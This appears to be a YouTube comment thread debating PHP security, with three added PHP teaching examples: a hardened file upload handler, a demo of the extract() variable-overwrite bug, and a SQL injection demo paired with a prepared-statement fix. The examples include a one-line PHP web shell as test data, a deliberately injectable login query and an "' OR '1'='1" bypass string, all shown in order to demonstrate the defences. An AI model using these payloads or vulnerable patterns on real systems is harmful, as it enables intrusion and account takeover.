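An upload handler that does what the comment above asks for, written as an added example (not code from the video, the commenter, or any framework): the file lands outside the document root, the type decision comes from the bytes rather than the client's name or Content-Type, the stored name is random, and the only way back to the file is a PHP endpoint. The storage path and the allow-list are assumptions chosen for the demo.

```php
<?php
// Added example, not from the video or thread: upload handling that keeps the
// file out of any URL-reachable directory and never trusts client metadata.

declare(strict_types=1);

// Assumed layout: document root is /var/www/html/public; storage sits beside
// it, not under it, so nothing stored can be requested as /uploads/x.php.
const STORAGE_DIR = '/var/www/storage/uploads';

// Allowed types, keyed by the MIME type sniffed from the file's bytes.
const ALLOWED = [
    'image/png'       => 'png',
    'image/jpeg'      => 'jpg',
    'application/pdf' => 'pdf',
];

// Extension to store under, or null if the content is not allowed. The
// decision uses finfo on the bytes, not $_FILES['type'] or the original
// name, both of which the uploader controls.
function allowedExtension(string $tmpPath): ?string
{
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($tmpPath);
    return ALLOWED[$mime] ?? null;
}

// Opaque storage name: random hex, no user-controlled characters, so double
// extensions like "shell.php.png" cannot survive into the file system.
function storageName(string $ext): string
{
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Handler for a multipart POST; $file is one entry of $_FILES.
function handleUpload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    $ext = allowedExtension($file['tmp_name']);
    if ($ext === null) {
        throw new RuntimeException('file type not allowed');
    }
    $name = storageName($ext);
    if (!move_uploaded_file($file['tmp_name'], STORAGE_DIR . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

// Download endpoint: the only route to a stored file. The name must match
// what storageName() produces, so "../" can never appear, and the
// Content-Type comes from the allow-list, never from the file itself.
function serveStored(string $name): void
{
    if (!preg_match('/^[0-9a-f]{32}\.(png|jpg|pdf)$/', $name)) {
        http_response_code(404);
        return;
    }
    $path = STORAGE_DIR . '/' . $name;
    if (!is_file($path)) {
        http_response_code(404);
        return;
    }
    $mime = array_search(pathinfo($name, PATHINFO_EXTENSION), ALLOWED, true);
    header('Content-Type: ' . $mime);
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: attachment; filename="' . $name . '"');
    readfile($path);
}

// CLI demo of the content check with constructed files (no web server).
if (PHP_SAPI === 'cli') {
    $png = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($png, "\x89PNG\r\n\x1a\n" . str_repeat("\0", 32));
    $php = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($php, "<?php system(\$_GET['c']); ?>");
    var_dump(allowedExtension($png));
    var_dump(allowedExtension($php));
    unlink($png);
    unlink($php);
}
```

Run from the CLI, the constructed PNG is accepted and the PHP source is rejected because its sniffed type is not in the allow-list. The symlink-to-public shortcut the comment mentions undoes all of this: once the storage directory is reachable by URL, the web server, not PHP, decides what happens when someone requests a file there.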
I started web dev with php and wordpress and making custom theme. I thought I was wizard for being able to do custom themes back then.
You would still be a wizard because nobody wants to touch WordPress with even a stick nowadays
@@Davidlavierino I wonder why I get so many WordPress offers
It's time for a sveltphp framework
It's not the language, it hardly ever is, it's the developer and the ecosystem that are the main problems. That's why most JS is so garbage, too many inexperienced devs writing rubbish while using trash packages.
PHP is a fine language these days, Laravel is pretty good... but then TurdPress still sticks around like a bad smell. TurdPress compounds poor code with a plugin ecosystem that is just the absolute worst.
"Lmao, php is so insecure and old". *5 minutes later* "Omg, react in the server, raw SQL in frontend is the future!!"
Just want to start freelancing and hope to be full time remote working from anywhere. PHP seems to be a solid choice.
Listening to the Oppenheimer Soundtrack while watching ThePrimaegen makes his videos so much more intense xD.
I used PHP professionally for several years, and while it HAS made huge leaps I still can't stand the language. As for it being insecure, IMO the existence of features like extract() and using PHP for templating DO make it easier to write certain types of vulnerabilities regardless of what framework you're using IF you use those features. Sure you can avoid using unsafe features and have high standards for your code, but there are some foot guns that exist in PHP that I haven't seen in any other language.
Still a developer problem, why do you blame a language and not yourself when writing unsafe code
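The extract() footgun mentioned two comments up, as an added example that is not code from the video or from either commenter. extract() on request data recreates what register_globals did before it was removed in PHP 5.4: any query parameter becomes a local variable, including ones the code already set. The function names and the constructed query string are made up for the demo.

```php
<?php
// Added example, not from the video or thread: extract() on request data
// lets the client overwrite local variables.

declare(strict_types=1);

// Constructed query string: ?id=42&isAdmin=1
$_GET = ['id' => '42', 'isAdmin' => '1'];

// Vulnerable: extract() silently replaces $isAdmin with the client's "1".
function showProfileUnsafe(): string
{
    $isAdmin = false;          // the developer's intended default
    extract($_GET);
    $id = (int) $id;
    return $isAdmin ? "profile $id (admin view)" : "profile $id";
}

// Fix 1: name the inputs you actually want; nothing else can leak in.
function showProfileSafe(): string
{
    $isAdmin = false;
    $id = (int) ($_GET['id'] ?? 0);
    return $isAdmin ? "profile $id (admin view)" : "profile $id";
}

// Fix 2: if extract() must stay (legacy template code), EXTR_SKIP refuses to
// overwrite variables that already exist, and EXTR_PREFIX_ALL would put
// every key under a prefix instead.
function showProfileExtrSkip(): string
{
    $isAdmin = false;
    extract($_GET, EXTR_SKIP);
    $id = (int) ($id ?? 0);
    return $isAdmin ? "profile $id (admin view)" : "profile $id";
}

echo showProfileUnsafe(), "\n";
echo showProfileSafe(), "\n";
echo showProfileExtrSkip(), "\n";
```

The first line shows the admin view for an unauthenticated request; the other two do not. The same class of bug appears with `$$name` variable variables and with `parse_str($query)` called without its second argument on PHP 7, which is why PHP 8 made that argument mandatory.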
PHP's security originated from its ease. It was so easy that bad programmers could throw together a website and think that it's perfect. PHP is an effective tool, I just hate using it.
I am always surprised that the only thing ppl know about PHP is laravel and lambo and mega god entities.
Php used to be absolute shit (version 3) - you had to tweak the out of the box php.ini turning off things like register globals.
And I still use perl. Not as a cgi. I use HTML::Mason and it lets you write perl the same way you do php.
Php devs are insecure, I think he forgot a word.
Why did the like button glow when you said to press it?
PHP + HTMX = Gold, but you will never know :)
That was a straw man argument. The argument has never been that the language was insecure, it is just that many of the applications written with PHP were insecure. 20 years later some of the apps have cleaned up their security, but that doesn’t change history.
20 years ago what web apps were secure? Most of the terminology wasn't even invented back then 😂😂
Sorry php might be some god given tool but I still can't bring myself to use it.
Writing php feels just weird..
Imagine having builtin templating capabilities to embed HTML inside the language only to prohibit using it and instead rely on an external tool (e.g. blade) that has pseudophp syntax, is very limited and has to be built into actual PHP…
@ThePrimeTimeagen Why you always leave first and last letter while marking text? O_o
nailed the landing
Aren’t most issues from passing raw strings to the DB, not the language per-se?
Just don’t raw insert those stings in there, if you know what I mean.
Yes, but "SELECT * FROM users WHERE username =" . $username . " AND password =" . $password; was easy, so it was far too common.
@@BlazingMagpie you are right but that was in 99, before devs transitioned to pdo, prepared statements, and ORMs
@@rcmnet *Competent devs. To this day I find injectable DB access because someone in the company wrote it decades ago and "if it works, don't touch it". Some senior devs write it like this to this day, or at least copy-paste it from "parts that work".
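The concatenated login query from this thread, run against an in-memory SQLite database so the injection is reproducible, beside the PDO prepared-statement version. This is an added example, not code from the video or from any commenter; the tables, the user "alice", her password and the attacker string are all constructed for the demo. The hardened version also moves the password check out of SQL and onto password_hash()/password_verify(), since comparing a password inside the query requires storing it in a form SQL can compare.

```php
<?php
// Added example, not from the video or thread: string-built SQL versus a
// prepared statement, with a real bypass against the former.

declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// Let the database engine separate code from data instead of PDO's emulation.
$db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);

// Constructed legacy table: plaintext passwords, as the old query assumed.
$db->exec('CREATE TABLE users_legacy (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
$db->exec("INSERT INTO users_legacy (username, password) VALUES ('alice', 'hunter2')");

// Constructed current table: only a salted hash is stored.
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password_hash TEXT)');
$ins = $db->prepare('INSERT INTO users (username, password_hash) VALUES (?, ?)');
$ins->execute(['alice', password_hash('correct horse battery staple', PASSWORD_DEFAULT)]);

// Vulnerable: the query from the comment, with the quotes it needs to parse.
function loginUnsafe(PDO $db, string $username, string $password): bool
{
    $sql = "SELECT id FROM users_legacy WHERE username = '" . $username
         . "' AND password = '" . $password . "'";
    return (bool) $db->query($sql)->fetchColumn();
}

// Hardened: placeholders keep input as data; the password is verified in PHP.
function loginSafe(PDO $db, string $username, string $password): bool
{
    $stmt = $db->prepare('SELECT password_hash FROM users WHERE username = ?');
    $stmt->execute([$username]);
    $hash = $stmt->fetchColumn();
    // Verify against a throwaway hash for unknown users so response time
    // does not reveal which usernames exist.
    if ($hash === false) {
        $hash = password_hash('dummy', PASSWORD_DEFAULT);
    }
    return password_verify($password, $hash);
}

// Constructed attacker input: turns the WHERE clause into "... OR '1'='1'".
$bypass = "' OR '1'='1";

var_dump(loginUnsafe($db, 'alice', $bypass));
var_dump(loginSafe($db, 'alice', $bypass));
var_dump(loginSafe($db, 'alice', 'correct horse battery staple'));
```

The first call returns true without knowing any password; the second treats the same string as a wrong password and returns false; the third succeeds only with the real one. A placeholder is not an escaping function applied at the last moment, which is the difference between this and the `real_escape_string` approach: the query text is fixed before any value is attached, so there is no string for the attacker's quote to close.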
I know a security expert that codes exclusively in php...
My little noobie nerds! Because "ex-Googles" or any other "big techs" "Super Developers" and successful influencers, complain about PHP or any other language. It doesn't mean that they are right! Use the language of your choice. and just let them be influencers. At the end of the day, all that matters is if you did your job and earned the money for this job. With My respects!
the name is a known known, known unknown, unkno.. kno.. agen!
Yarn 1 is abandonware. Yarn 4 is pretty cool actually but it breaks ide support so nobody uses it.
Welcome to Costco magnumdingus
hmm, I need to make an updated lamp installer
Oh boy he really be spicy
Yeah last time i heard PHP it wasn't about how insecure it is 😅
full ack, but the more important thing: why exactly are you wearing headphones if you're the only one talking? 🤔
Because the audio playing from his speakers would feed back into his microphone
don't forget Drupal
We have a service built by a 3rd party in laravel php. Out of all our services, this gives us the most issues from our security scans. We have several services written in typescript and c# but it's our one service written in php that gives us the most issues. Maybe the developers used bad 3rd party packages, idk. But it gives me the impression that php is insecure without knowing much about the ecosystem of the language.
It's so powerful that it made your team think that toy code was professional software. Think about it.
Reading the author's tagline: "Dad, husband, hacker, musician"
A "hacker" is trying to convince us that PHP is safe and everyone should use it... 🤔
It does not matter if he's a hacker
I'm okay with programming languages being insecure as you have to start somewhere. Programmers work at the boundary between the unsafe computer and the safe user environment. The idea of "safe at all costs" is bullshit. Footguns are another story.
Most php folks praise Laravel, but Symfony is even better
When php ran 90% of the web in the 90s, most of the vulnerabilities showed up in php. And of those, how many WordPress sites had default admin settings with weak md5 passwords stored simply
The author of that post confused me. RAW PHP is insecure? and using a Framework will make it Secure? It's not the problem of the Language then. It may be a problem of who is using it or how we use PHP. hehehe
i can see he's getting tired at this point
The one and only Fireship is a pleated pants andy
Most of the criticisms of PHP I hear are not about PHP itself but about WordPress.
@ThePrimeTime PHP Laravel coding stream WHEN?
If you were writing a web app from scratch today which language/ stack would you choose?
Depends on the requirements quite a bit.. But if I didn't need a lot of weird integrations I'd go with Haskell / IHP. If I need support for lots of corporatey stuff I'd go with F# / Falco (+ Fable).
Bootstrap + HTMX + Rust (Rocket) is what I'm currently trying out. Will probably use Postgres for the database.
100% PHP, but only if laravel and symfony did not exist.
In the best case, sure, it's probably safe. The problem is 90% of it happens to be in use on wordpress sites, which are known to be hilariously insecure.
Wordpress is not insecure by default. It's "just" that it is *extremely easy* to make a theme or plugin with security vulnerabilities without even trying.
Yeah a blank page might be less of an issue, but anything worth securing won't be a factory install of wordpress, it will have dozens of plugins.@@zekicay
Even then, if you look at exploit trackers, there's a new core issue every few weeks. That's less than the daily ones related to plugins, but it's still really bad.
It's the WordPress dilemma.
They are reaching and marketing towards a non-technical audience, therefore, they have to simplify and abstract away a lot of the stuff a newcomer might find difficult. A lot of that code kinda becomes ugly fast.
@@oserodal2702 Wordpress even after so many years, they haven't adopted or created any templating engine (which gives you some guidelines). Everything is in a PHP file if you want to, like 20 years ago (queries, 'raw' PHP, some CSS, some JS, some hooks, some PHP templating). Template overriding: you can do it with files, you can do it with hooks, you can do it however. So, no structure. Defining a theme by a CSS file :'). A freaking JSON or YAML for defining a theme? Wordpress is still trying to escape the jQuery nightmare and badly written JS code from plugins. Wordpress database design sucks, or maybe I could say it does not have one. Either you write custom queries to optimise your website, OR you make almost 150-300 requests on page load when you have a lot of custom fields. Security is a non-existent subject. The abstract functional coding approach and all the folders that can be publicly accessed for Wordpress to work, it is just bad: wp/content/[plugins/**, themes/**, and so on]. When a lot of badly coded plugins are publicly available (the code, on your server) anyone can find exploits! Wordpress, unfortunately, powers millions of websites, so it's an easy target and a hot one too. It's a mess, and it's a mess associated with PHP. I see developers make 'APPS' or use Wordpress as a CMS for an API god dammit. But PHP 8+ is great @oserodal2702
I think PHP IS insecure, but not because of the reasons in the article. PHP has some really bad functions that can do much more than almost anyone really needs. In later versions some of those "features" can be disabled in config, but a lot of defaults are not great for security. Old APIs for system interactions or interops are archaic and booby-trapped.
skipped thru the entire video & only saw one line of actual code that didn't even illustrate his point. it was literally just echo'ing the result of a concatenated string 😂
What music is he talking about? the subscriber music?